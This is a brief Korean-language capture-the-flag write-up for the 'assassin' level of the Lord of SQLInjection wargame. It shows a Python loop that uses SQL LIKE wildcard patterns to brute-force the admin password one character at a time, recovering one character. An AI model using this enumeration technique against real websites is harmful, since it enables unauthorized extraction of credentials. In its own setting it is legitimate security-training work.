LORD OF SQLINJECTION - assassin

해석하면 result의 id값이 admin일 때 solve되는데, admin의 pw를 구해야할 것 같다.

먼저 pw like '________'로 query를 했더니 Hello guest가 떴다. 왠지 admin의 password length도 8일 것 같다.

그럼 python을 사용해서 guest와 admin의 password가 다를 때를 출력해보도록 하자.

 

for i in range(33, 127):         query = "pw=__{}%".format(chr(i))         r = requests.get(url+query, headers = headers)         if "Hello admin" in r.text:             print(chr(i))             break

처음에는 {}%로 주었다가 한개씩 _를 앞에 추가해서 admin이 출력되는 pw를 찾았더니 2가 출력되었다.

그럼 admin의 pw가 __2%의 형태 다시 말하면 __2_____라는 것을 알 수있다. 

 

 

clear